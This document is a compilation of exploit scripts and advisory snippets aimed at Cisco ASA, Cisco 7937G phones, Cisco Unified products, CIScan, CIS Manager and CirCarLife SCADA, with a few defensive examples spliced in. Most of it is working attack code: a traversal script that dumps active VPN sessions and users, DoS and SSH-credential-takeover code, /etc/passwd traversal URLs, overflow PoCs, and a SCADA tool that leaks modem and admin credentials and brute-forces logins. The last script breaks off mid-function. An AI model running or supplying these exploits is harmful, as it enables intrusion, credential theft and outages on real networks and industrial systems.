'''
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
Vulnerable Products
This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products:
3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
Script usage
Installation: git clone https://github.com/yassineaboukir/CVE-2018-0296.git
Usage: python cisco_asa.py <URL>
If the web server is vulnerable, the script will dump in a text file both the content of the current directory, files in +CSCOE+ and active sessions.
Disclaimer: please note that due to the nature of the vulnerability disclosed to Cisco, this exploit could result in a DoS so test at your own risk.
Bug Bounty Recon
You can use Shodan, Censys or any other OSINT tools to enumerate vulnerable servers or simply google dork /+CSCOE+/logon.html. Figure it out :)
References:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd
'''
#!/usr/bin/env python
import requests
import sys
import urlparse
import os
import re
print("""
_____ _____ _____ _____ _____ ___ _____ ___
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
| | | | `--. \ | | | | | | _ | `--. \ _ |
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
______ _ _ _____ _
| ___ \ | | | | |_ _| | |
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
CVE-2018-0296
Script author: Yassine Aboukir(@yassineaboukir)
""")
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
regexSess = r"([0-9])\w+'"
regexUser = r"(user:)\w+"
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"

# Fingerprint: the WebVPN logon page on Cisco ASA sets a webvpnLang cookie
try:
    is_cisco_asa = requests.get(urlparse.urljoin(url, logon), verify=False, allow_redirects=False)
except requests.exceptions.RequestException as e:
    print(e)
    sys.exit(1)

if "webvpnLang" in is_cisco_asa.cookies:
    try:
        filelist_r = requests.get(urlparse.urljoin(url, filelist_dir), verify=False)
        CSCOE_r = requests.get(urlparse.urljoin(url, CSCOE_dir), verify=False)
        active_sessions_r = requests.get(urlparse.urljoin(url, active_sessions), verify=False)
    except requests.exceptions.RequestException as e:
        print(e)
        sys.exit(1)

    if filelist_r.status_code == 200:
        with open(urlparse.urlparse(url).hostname + ".txt", "w") as cisco_dump:
            cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCOE+ Directory ========\n {}\n ======= Active sessions =========\n {}\n ======= Active Users =========\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
            # User extraction: one request per session id found in the sessions listing
            matches_sess = re.finditer(regexSess, active_sessions_r.text)
            for match_sess in matches_sess:
                active_users_r = requests.get(urlparse.urljoin(url, active_sessions + str(match_sess.group().strip("'"))), verify=False)
                matches_user = re.finditer(regexUser, active_users_r.text)
                for match_user in matches_user:
                    cisco_dump.write(match_user.group() + "\n")
            # End of user extraction
        print("Vulnerable! Check the text dump saved in {}".format(dir_path))
    else:
        print("Not vulnerable!")
else:
    print("This is not Cisco ASA! e.g: https://vpn.example.com/+CSCOE+/logon.html\n")
    sys.exit(1)
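From the defender's side, the request pattern above (`/+CSCOU+/../+CSCOE+/files/file_list.json`) is easy to spot in access logs once the path is percent-decoded and the query string is stripped. The following detector is an added example written for this page, not part of the original script or the Cisco advisory; the log lines are constructed in the combined log format, and the `LOG_RE` pattern and function names are my own. It goes slightly beyond the page's literal URLs by decoding twice, so `%2e%2e` and `%2b` variants are caught as well.

```python
"""Flag CVE-2018-0296-style traversal requests in web access logs.
Added example for this page; sample log lines are constructed, not captured."""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). Only lines 2 and 3
# carry the traversal; the rest are ordinary WebVPN traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jun/2018:10:01:02 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 5123
10.0.0.5 - - [06/Jun/2018:10:01:03 +0000] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/ HTTP/1.1" 200 812
10.0.0.5 - - [06/Jun/2018:10:01:04 +0000] "GET /%2bCSCOU%2b/%2e%2e/%2bCSCOE%2b/files/file_list.json?path=/sessions/ HTTP/1.1" 200 640
10.0.0.7 - - [06/Jun/2018:10:02:00 +0000] "GET /+CSCOE+/portal.html HTTP/1.1" 302 0
10.0.0.9 - - [06/Jun/2018:10:03:00 +0000] "GET /+CSCOU+/css/main.css HTTP/1.1" 200 2210
"""

# Assumed combined-format layout: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_path(target):
    """Drop the query string and percent-decode twice (catches double encoding)."""
    path = target.split("?", 1)[0]
    return unquote(unquote(path))


def is_asa_traversal(target):
    """True when a '..' segment is used to reach the +CSCOE+ files handler."""
    path = normalise_path(target)
    has_dotdot = "/../" in path or path.endswith("/..")
    hits_cscoe_files = "/+CSCOE+/files/" in path
    return has_dotdot and hits_cscoe_files


def scan_log(text):
    """Return (ip, normalised_path, status) for every matching request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_asa_traversal(m.group("target")):
            findings.append((m.group("ip"), normalise_path(m.group("target")), int(m.group("status"))))
    return findings


if __name__ == "__main__":
    for ip, path, status in scan_log(SAMPLE_LOG):
        print("%s requested %s (HTTP %d)" % (ip, path, status))
```

A `200` on such a request is the interesting signal: on a patched appliance the traversal is rejected, so a success status paired with this path shape is worth an alert rather than just a log entry.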
# Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation
# Date: 2020-08-10
# Exploit Author: Cody Martin
# Vendor Homepage: https://cisco.com
# Version: <=SIP-1-4-5-7
# Tested On: SIP-1-4-5-5, SIP-1-4-5-7
#!/usr/bin/python
import sys
import getopt
import requests
import paramiko
import socket
import os


def main(argv):
    target = ""
    attack = ""
    username = ""
    password = ""
    finished = 0  # default so the summary below never reads an unassigned name
    divider = "============================================="
    help_text = '''
exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password]
%s
Example: exploit.py -t 192.168.1.200 -a 1
Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa
%s
Attack types:
1: DoS with automatic device reset
2: DoS without automatic device reset
3: Change SSH credentials of target device
''' % (divider, divider)
    if len(sys.argv) == 1:
        print(help_text)
        sys.exit(2)
    try:
        opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="])
    except getopt.GetoptError:
        print(help_text)
        sys.exit(2)
    for opt, arg in opts:
        if opt == "-h":
            print(help_text)
            sys.exit()
        elif opt in ("-t", "--target"):
            target = arg
        elif opt in ("-a", "--attack"):
            attack = arg
        elif opt in ("-u", "--user"):
            username = arg
        elif opt in ("-p", "--password"):
            password = arg
    if username != "" and password != "" and attack == "3":
        print("Starting SSH attack!")
        print(divider)
        print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password)
        finished = attack_ssh(target, username, password)
    elif attack == "1":
        print("Starting DoS reset attack!")
        print(divider)
        print("Target: ", target, "\nAttack: ", attack)
        finished = dos_one(target)
    elif attack == "2":
        print("Starting DoS non-reset attack!")
        print(divider)
        print("Target: ", target, "\nAttack: ", attack)
        finished = dos_two(target)
    print(divider)
    if finished == 1:
        print("DoS reset attack completed!")
    elif finished == 2:
        print("DoS non-reset attack completed!")
        print("Device must be power cycled to restore functionality.")
    elif finished == 3:
        tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password)
        connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target)
        print(tell)
        print("You must specify the key exchange when connecting or the device will be DoS'd!")
        print(connection_example)
    elif finished == 0:
        print("Something strange happened. Attack likely unsuccessful.")
    sys.exit()


def dos_one(target):
    url = "http://%s/localmenus.cgi" % target
    data = "A" * 46
    payload = {"func": "609", "data": data, "rphl": "1"}
    print("FIRING ZE MIZZLES!")
    for i in range(1000):
        try:
            r = requests.post(url=url, params=payload, timeout=5)
            if r.status_code != 200:
                print("Device doesn't appear to be functioning or web access is not enabled.")
                sys.exit()
        except requests.exceptions.RequestException:
            # The device stopped answering: the reset-type DoS has taken effect
            return 1
    return 0


def dos_two(target):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(15)
    try:
        sock.connect((target, 22))
    except OSError:
        print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.")
        sys.exit()
    transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1",
                                                                            "diffie-hellman-group14-sha1",
                                                                            "diffie-hellman-group1-sha1"]})
    # Silence paramiko's stderr output for the duration of the failing handshake
    fd = os.open("/dev/null", os.O_WRONLY)
    savefd = os.dup(2)
    os.dup2(fd, 2)
    try:
        transport.connect(username="notreal", password="notreal")
    except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):
        os.dup2(savefd, 2)
        return 2
    os.dup2(savefd, 2)
    return 0


def attack_ssh(target, username, password):
    url = "http://%s/localmenus.cgi" % target
    payload_user = {"func": "403", "set": "401", "name1": username, "name2": username}
    payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password}
    print("FIRING ZE MIZZLES!")
    try:
        r = requests.post(url=url, params=payload_user, timeout=5)
        if r.status_code != 200:
            print("Device doesn't appear to be functioning or web access is not enabled.")
            sys.exit()
        r = requests.post(url=url, params=payload_pass, timeout=5)
        if r.status_code != 200:
            print("Device doesn't appear to be functioning or web access is not enabled.")
            sys.exit()
    except requests.exceptions.RequestException:
        print("Device doesn't appear to be functioning or web access is not enabled.")
        sys.exit()
    return 3


if __name__ == "__main__":
    main(sys.argv[1:])
source: https://www.securityfocus.com/bid/50372/info
Multiple Cisco products are prone to a directory-traversal vulnerability.
Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks.
This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.
The following products are affected:
Cisco Unified IP Interactive Voice Response
Cisco Unified Contact Center Express
Cisco Unified Communications Manager
http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml
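The `IVRGetAudioFile.do?file=../../...` requests above work because the `file` parameter is joined onto a directory and served as-is. The check below is an added example, not Cisco's code and not from the advisory: it shows the naive join beside a canonicalising version that resolves the candidate path and refuses anything outside the intended directory. The directory layout and file contents are constructed in a temporary directory; `unsafe_open_path`, `safe_open_path` and `demo` are my names.

```python
"""Path-traversal guard for a 'serve file by name' handler.
Added example; base directory, file names and contents are constructed."""
import os
import tempfile
from urllib.parse import unquote


def unsafe_open_path(base_dir, user_file):
    # The vulnerable pattern: join the user value and trust the result.
    return os.path.join(base_dir, user_file)


def safe_open_path(base_dir, user_file):
    """Return the canonical path inside base_dir, or None if the request escapes it."""
    base = os.path.realpath(base_dir)
    # Decode percent-encoding first so '..%2f' is judged as '../', not as a file name.
    candidate = os.path.realpath(os.path.join(base, unquote(user_file)))
    # realpath also collapses symlinks, so a link pointing outside base is caught too.
    if candidate == base or not candidate.startswith(base + os.sep):
        return None
    return candidate


def demo():
    """Build a tiny tree and exercise both functions with traversal inputs."""
    with tempfile.TemporaryDirectory() as root:
        audio = os.path.join(root, "audio")
        os.makedirs(audio)
        with open(os.path.join(audio, "welcome.wav"), "wb") as fh:
            fh.write(b"RIFF")  # constructed stub content
        secret = os.path.join(root, "platformConfig.xml")  # constructed stand-in
        with open(secret, "w") as fh:
            fh.write("<config/>")
        return {
            "legit": safe_open_path(audio, "welcome.wav") is not None,
            "dotdot": safe_open_path(audio, "../platformConfig.xml"),
            "encoded": safe_open_path(audio, "..%2fplatformConfig.xml"),
            "absolute": safe_open_path(audio, "/etc/passwd"),
            "unsafe_escapes": os.path.realpath(unsafe_open_path(audio, "../platformConfig.xml"))
                              == os.path.realpath(secret),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-15s %s" % (name, value))
```

The `startswith(base + os.sep)` comparison is the important detail: comparing against `base` alone would accept a sibling directory whose name merely begins with the same characters (`/srv/audio2` passes a `/srv/audio` prefix test).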
#!/usr/bin/python
# Exploit Title : CIScanv1.00 Hostname/IP Field SEH Overwrite POC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 11/05/2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx
# Tested Version : 1.00
# Vulnerability Type: SEH Overwrite POC
# Tested on OS : Windows 7 Home Basic
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
#SEH chain of main thread
#Address SE handler
#0012FA98 43434343
#42424242 *** CORRUPT ENTRY ***
# Offset to the SEH Frame is 536
# Offset to the SEH frame is 536 (bytes literals so the PoC runs under Python 2 and 3)
buffer = b"A" * 536
# Next SEH record pointer (nSEH)
nseh = b"B" * 4
# SEH handler address, generally a P/P/R (pop/pop/ret) address
seh = b"C" * 4
f = open("evil.txt", "wb")
f.write(buffer + nseh + seh)
f.close()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title : CIScanv1.00 Hostname/IP Field Local BoF PoC
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 05.05.2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx#
# Tested Version : 1.00
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Enterprise SP1 x64 en
#
#
# Steps to Produce the Crash:
# 1.- Run the Python code: python CIScanv1-BoF.py
# 2.- Open CIScanv1-BoF.txt and copy its content to the clipboard
# 3.- Open CIScan.exe
# 4.- Click the Ok button
# 5.- Paste the clipboard into Scan > Hostname/IP
# 6.- Click the add button (->)
# 7.- Click the Aceptar button
# 8.- Crashed
buffer = "\x41" * 388
eip = "\x42" * 4
f = open ("CIScanv1-BoF.txt", "w")
f.write(buffer + eip)
f.close()
source: https://www.securityfocus.com/bid/67442/info
CIS Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/autenticar/lembrarlogin.asp?email=[SQL Injection]
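The `lembrarlogin.asp?email=` endpoint is a "remind me of my login" lookup, so the injection point is the e-mail value inside a `WHERE` clause. The following is an added example, not CIS Manager's code: an in-memory SQLite table with constructed rows, a lookup that builds the query by string formatting (the vulnerable shape) and the same lookup with a bound parameter. The table and column names are my own.

```python
"""String-built query beside a parameterised one for an e-mail lookup.
Added example; database rows are constructed."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usuarios (id INTEGER PRIMARY KEY, email TEXT, login TEXT)")
    conn.executemany(
        "INSERT INTO usuarios (email, login) VALUES (?, ?)",
        [("ana@example.com", "ana"), ("bob@example.com", "bob"), ("cid@example.com", "cid")],
    )
    return conn


def lookup_login_vulnerable(conn, email):
    # Vulnerable: the e-mail value becomes part of the SQL text itself.
    sql = "SELECT login FROM usuarios WHERE email = '%s'" % email
    return [row[0] for row in conn.execute(sql)]


def lookup_login_safe(conn, email):
    # Hardened: the driver binds the value; it cannot alter the query structure.
    return [row[0] for row in conn.execute("SELECT login FROM usuarios WHERE email = ?", (email,))]


def demo():
    conn = make_db()
    payload = "x' OR '1'='1"  # the classic tautology, stands in for "[SQL Injection]" above
    return {
        "normal_vuln": lookup_login_vulnerable(conn, "bob@example.com"),
        "normal_safe": lookup_login_safe(conn, "bob@example.com"),
        "payload_vuln": lookup_login_vulnerable(conn, payload),
        "payload_safe": lookup_login_safe(conn, payload),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

With the tautology the string-built query returns every login in the table, while the parameterised query looks for a literal e-mail address equal to the payload and returns nothing; that difference in row count is also a usable signal when reviewing query logs for this endpoint.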
# Exploit Title: CirCarLife SCADA 4.3.0 - Credential Disclosure
# Date: 2018-09-10
# Exploit Author: David Castro
# Vendor Homepage: https://circontrol.com/
# Shodan Dork: Server: CirCarLife Server: PsiOcppApp
# Version: CirCarLife Scada all versions under 4.3.0 OCPP implementation all versions under 1.5.0
# CVE : CVE-2018-12634
'''
Description: Multiple information disclosure issues, including admin credentials disclosure
'''
import requests
from requests.auth import HTTPDigestAuth
from termcolor import colored
from bs4 import BeautifulSoup
import xml.etree.ElementTree as ET
import re
import json
import base64

cabecera = '''
_.-="_- _
_.-=" _- | ||"""""""---._______ __..
___.===""""-.______-,,,,,,,,,,,,`-''----" """"" """"" __'
__.--"" __ ,' CIR-PWN-LIFE o \ __ [__|
__-""=======.--"" ""--.=================================.--"" ""--.=======:
] [w] : / \ : |========================| : / \ : [w] :
V___________:| SadFud75 |: |========================| :| |: _-"
V__________: \ / :_|=======================/_____: \ / :__-"
-----------' "-____-" `-------------------------------' "-____-"
'''

print colored(cabecera, 'white')
print colored('[*] POC for automated exploitation for CirControl SCADA systems (circarlife and OCPP (Open Charge Point Protocol))', 'blue')
print colored('[?] Vendor site: https://circontrol.com/', 'yellow')
print colored('[*] CVEs associated: ', 'blue')
print colored('CVE-2018-12634, CVE-2018-16668, CVE-2018-16669, CVE-2018-16670, CVE-2018-16671, CVE-2018-16672', 'yellow')
print colored('[*] CirCarLife Scada versions affected: ', 'blue')
print colored('[+] All versions are vulnerable. No patch available, last version 4.3.0 (09/09/2018)', 'green')
print colored('[*] PsiOcppApp (PowerStudio integration Open Charge Point Protocol Application) versions affected: ', 'blue')
print colored('[+] All versions are vulnerable. No patch available, last version 1.5.0 (09/09/2018)', 'green')
print colored('[*] Shodan dorks: ', 'blue')
print colored('[+] Server: CirCarLife', 'green')
print colored('[+] Server: PsiOcppApp', 'green')
print colored('[?] More vulnerability POCs at https://github.com/SadFud/Exploits', 'yellow')

plcs = []
logutil = ['GPRS modem details']
autenticado = False
arr_versionessoft = []
arr_ldevstat = []
str_repository = ''
str_lversioneshard = ''
arr_logdetails = []
str_lsetup = ''
str_lconfig = ''


def lversionessoft():
    # Unauthenticated device-id page lists device name, software name/version and time
    print colored('[*] Getting software versions via CVE-2018-16671', 'blue')
    leakv = requests.get(target1 + '/html/device-id')
    versiones = leakv.text.encode("utf8").split('\n')
    print colored('[+] Software versions collected succesfully', 'green')
    return versiones


def ldevstat():
    # Unauthenticated values.xml exposes PLC names and status codes
    print colored('[*] Getting plc status via CVE-2018-16670', 'blue')
    leakstats = requests.get(target1 + '/services/user/values.xml?var=STATUS')
    statsraw = leakstats.text
    tree = ET.fromstring(statsraw)
    for i in range(0, len(tree.findall(".//variable"))):
        for j in range(0, 2):
            plcs.append(tree[i][j].text)
    print colored('[+] information leaked from ' + str(len(plcs) / 2) + ' plcs', 'green')
    return plcs


def plcstatus(code):
    code = int(code)
    if code == 1:
        print colored('[+] OK', 'green')
    elif code == 2:
        if code == 0x10:
            if code == 0x20:
                print colored('[-] Error: Time out.', 'red')
            elif code == 0x40:
                print colored('[-] Error: Bad device.', 'red')
            elif code == 0x80:
                print colored('[-] Error: Bad phase.', 'red')
            elif code == 0x100:
                print colored('[-] Error: Bad version.', 'red')
            else:
                print colored('[-] Error: Unknown error.', 'red')
    elif code == 4:
        print colored('[-] Error: not initialized.', 'red')
    else:
        print colored('[?] Unknown code.', 'yellow')


def repository():
    print colored('[*] Getting installation paths via CVE-2018-16668', 'blue')
    path = requests.get(target1 + '/html/repository')
    rutas = path.text.encode("utf8").split('\n')
    platformpath = rutas[1].split(' ')
    platformpath = platformpath[0]
    appsrc = rutas[3].split(' ')
    appsrc = appsrc[0]
    raiz = str(appsrc).find('/circarlife/')
    appsrc = appsrc[0:raiz + len('/circarlife/')]
    print colored('[+] Platform installation path retrieved succesfully', 'green')
    return 'Platform installation path: ' + platformpath + '\n[+] Applicaction installation path: ' + appsrc


def lversioneshard():
    print colored('[*] Getting powerstudio driver versions via CVE-2018-12634', 'blue')
    basura = ['/li', '<', 'body', 'html', '>', '/ul', '/']
    hardleak = requests.get(target1 + '/services/system/info.html')
    hardleak = hardleak.text.encode("utf8").replace('<br />', '\n')
    hardleak = hardleak.replace('<li>', '\n')
    for caca in basura:
        hardleak = hardleak.replace(caca, '')
    print colored('[+] Powerstudio driver versions leaked succesfully', 'green')
    return hardleak


def logdetails():
    # The unauthenticated log page carries the modem id and the GPRS credentials
    print colored('[*] Leaking sensitive information via CVE-2018-12634', 'blue')
    log = requests.get(target1 + '/html/log')
    log = log.text.encode("utf8")
    print colored('[*] Searching for modem id', 'blue')
    posmid = log.rfind('/modem-start: modem id: ')
    logarr = log.split('\n')
    if posmid != -1:
        logutil.append('Modem model:')
        print colored('[*] Modem id located', 'blue')
        for linea in logarr:
            if '/modem-start: modem id: ' in linea:
                print colored('[+] Modem id leaked', 'green')
                linea = linea.split(' ')
                logutil.append(linea[9])
    else:
        print colored('[-] Modem id not found', 'red')
    print colored('[*] Searching for GPRS modem credentials', 'blue')
    poslogin = log.rfind('Greetings!!')
    if poslogin != -1:
        print colored('[*] Credentials found', 'blue')
        logutil.append('Modem credentials')
        print colored('[+] GPRS modem credentials retrieved', 'green')
        for linea in logarr:
            if 'password=\"' in linea:
                linea = linea.split(' ')
                logutil.append(linea[11])
                logutil.append(linea[12])
    else:
        print colored('[-] GPRS modem credentials not found with CVE-2018-12634', 'red')
    return logutil


def lsetup(user, pwd):
    print colored('[*] Exploiting CVE-2018-16672 to leak information', 'blue')
    r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user, pwd))
    if r1.text.encode("utf8").find('not granted') != -1:
        print colored('[-] Error, login failed', 'red')
    else:
        respuesta = r1.text.encode("utf8")
        print colored('[+] Setup information leaked')
        return respuesta


def lbrute():
    global luser80
    global lpasswd80
    global luser8080
    global lpasswd8080
    dicc = raw_input('Enter dictionary file with extension[format[user:password]]: ')
    listado = open(dicc, "r")
    data = listado.readlines()
    print colored('[*] Starting bruteforce...', 'blue')
    for linea in data:
        linea = linea.split(':')
        user = linea[0]
        pwd = linea[1]
        r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
        r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
        if r1.text.encode("utf8").find('not granted') != -1:
            print colored('[-] Error, login failed on port 80 with ' + user + ':' + pwd, 'red')
        else:
            print colored('[+] Valid credentials found on port 80: ' + user + ':' + pwd, 'green')
            luser80 = user
            lpasswd80 = pwd
        if r2.text.encode("utf8").find('Acess not granted') != -1:
            print colored('[-] Error, login failed on port 8080 with ' + user + ':' + pwd, 'red')
        else:
            print colored('[+] Valid credentials found on port 8080: ' + user + ':' + pwd, 'green')
            luser8080 = user
            lpasswd8080 = pwd
    listado.close()


def lconfig(user, pwd):
    print colored('[*] Leaking config file via CVE-2018-16669', 'blue')
    r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
    if r2.text.encode("utf8").find('Acess not granted') != -1:
        print colored('[-] Error. Login failed', 'red')
    else:
        config = r2.text.encode('utf8')
        print colored('[+] Config file leaked succesfully', 'green')
        return config


def salida(versiones, plcs, ruta, hard, log, setup, config):
    print colored('[*] Parsing information and generating output.', 'blue')
    print colored('[*] Parsing software information', 'blue')
    print colored('[+] Device name: ', 'green') + versiones[0]
    print colored('[+] Software_name: ', 'green') + versiones[1]
    print colored('[+] Software_version: ', 'green') + versiones[2]
    print colored('[+] System time: ', 'green') + versiones[3]
    print colored('[+] ', 'green') + ruta
    print colored('[*] Parsing powerstudio driver versions', 'blue')
    hard = hard.replace('ul', '')
    print colored(hard.strip(), 'green')
    print colored('[*] Parsing PLCs values', 'blue')
    for i in range(0, len(plcs)):
        if ((i % 2) != 0):
            codigo = plcs[i].split('.')
            plcstatus(codigo[0])
        else:
            nombre = plcs[i].replace('.STATUS', '')
            print colored('[+] PLC name: ' + nombre, 'green')
    print colored('[*] Parsing leaked data from logs using CVE-2018-12634', 'blue')
    if len(log) > 3:
        print colored('[*] ' + log[0], 'blue')
        for i in range(2, len(log)):
            if log[i] != 'Modem credentials':
                print colored('[+] GPRS router model found: ', 'green') + log[i]
                break
        for i in range(0, len(log)):
            if log[i] == 'Modem credentials':
                creds = i
                break
        for i in range(creds + 1, len(log)):
            if (log[i].rfind('user=')) != -1:
                usuario = log[i].split('=')
                user = usuario[1]
                user = user.replace('\"', '')
            if (log[i].rfind('password=')) != -1:
                cont = log[i].split('=')
                contrase = cont[1]
                contrase = contrase.replace('\"', '')
                contrase = contrase.replace(']', '')
                break
        print colored('[+] Username and password for GPRS modem found: ', 'green') + user + ':' + contrase
    else:
        print colored('[?] No data was extracted from logs using CVE-2018-12634', 'yellow')
    print colored('[*] Parsing setup file', 'blue')
    if (len(str(setup)) > 5):
        datos = json.loads(setup)
        print colored('[*] Processing device configuration data: ', 'blue')
        print colored('[+] MAC Address: ', 'green') + datos["device"]["mac"]
        print colored('[+] IMEI: ', 'green') + datos["device"]["imei"]
        print colored('[+] ICCID: ', 'green') + datos["device"]["iccid"]
        print colored('[+] IMSI: ', 'green') + datos["device"]["imsi"]
        print colored('[*] Processing network configuration data: ', 'blue')
        print colored('[+] Hostname: ', 'green') + datos["network"]["hostname"]
        print colored('[+] ClientId: ', 'green') + datos["network"]["clientid"]
        print colored('[+] IP address: ', 'green') + datos["network"]["ip"]
        print colored('[+] Netmask: ', 'green') + datos["network"]["netmask"]
        print colored('[+] Gateway: ', 'green') + datos["network"]["gateway"]
        print colored('[+] Name server 0: ', 'green') + datos["network"]["nameserver0"]
        print colored('[+] Name server 1: ', 'green') + datos["network"]["nameserver1"]
        print colored('[*] Processing locale options configuration data', 'blue')
        print colored('[+] Language: ', 'green') + datos["locale"]["language"]
        print colored('[+] Currency: ', 'green') + datos["locale"]["currency"]
        print colored('[*] Processing public address configuration data', 'blue')
        print colored('[+] Host type: ', 'green') + datos["paddress"]["hosttype"]
        print colored('[+] Host: ', 'green') + datos["paddress"]["host"]
        print colored('[*] Processing time configuration data', 'blue')
        print colored('[+] NTP Server 0: ', 'green') + datos["time"]["ntpserver0"]
        print colored('[+] NTP server 1: ', 'green') + datos["time"]["ntpserver1"]
        print colored('[+] Timezone: ', 'green') + datos["time"]["timezone"]
        print colored('[*] Processing GPRS modem configuration data', 'blue')
        print colored('[+] Acess point name: ', 'green') + datos["modem"]["apn"]
        print colored('[+] Username: ', 'green') + datos["modem"]["usr"]
        print colored('[+] Password: ', 'green') + datos["modem"]["pwd"]
        print colored('[+] Reset: ', 'green') + str(datos["modem"]["reset"])
        print colored('[+] Ping Ip: ', 'green') + str(datos["modem"]["pingip"])
        print colored('[+] Ping period: ', 'green') + str(datos["modem"]["pingperiod"])
        print colored('[+] Ping auto reset: ', 'green') + str(datos["modem"]["pingautoreset"])
        print colored('[*] Processing DDNS configuration data', 'blue')
        print colored('[+] DDNS server: ', 'green') + datos["ddns"]["server"]
        print colored('[+] DDNS host: ', 'green') + datos["ddns"]["host"]
        print colored('[+] DDNS Username: ', 'green') + datos["ddns"]["usr"]
        print colored('[+] DDNS password: ', 'green') + datos["ddns"]["pwd"]
        print colored('[*] Processing security configuration data', 'blue')
        print colored('[+] Username: ', 'green') + datos["security"]["user"]
        print colored('[+] Password: ', 'green') + str(datos["security"]["passwd"])
        print colored('[*] Processing services configuration data', 'blue')
        print colored('[+] iManager', 'green') + str(datos["services"]["imanager"])
        print colored('[+] Active-Integration: ', 'green') + str(datos["services"]["activeIntegration"])
        print colored('[+] Web Editor: ', 'green') + str(datos["services"]["webeditor"])
        print colored('[+] SCADA Applet: ', 'green') + str(datos["services"]["appletscada"])
        print colored('[+] Html5: ', 'green') + str(datos["services"]["html5"])
        print colored('[*] Parsing Open Charge Point Protocol configuration file', 'blue')
    else:
        print colored('[-] Unable to retrieve the setup config file', 'red')
    if (len(str(config)) > 10):
        tree = ET.fromstring(config)
        print colored('[*] Processing management system CS settings', 'blue')
        print colored('[+] End point: ', 'green') + str(tree.find('.//csEndPoint').text)
        print colored('[+] Username: ', 'green') + str(tree.find('.//csUser').text)
        print colored('[+] Password: ', 'green') + str(tree.find('.//csPassword').text)
        print colored('[+] Litle endian: ', 'green') + str(tree.find('.//isLitleEndian').text)
        print colored('[*] Processing Charge Box settings file', 'blue')
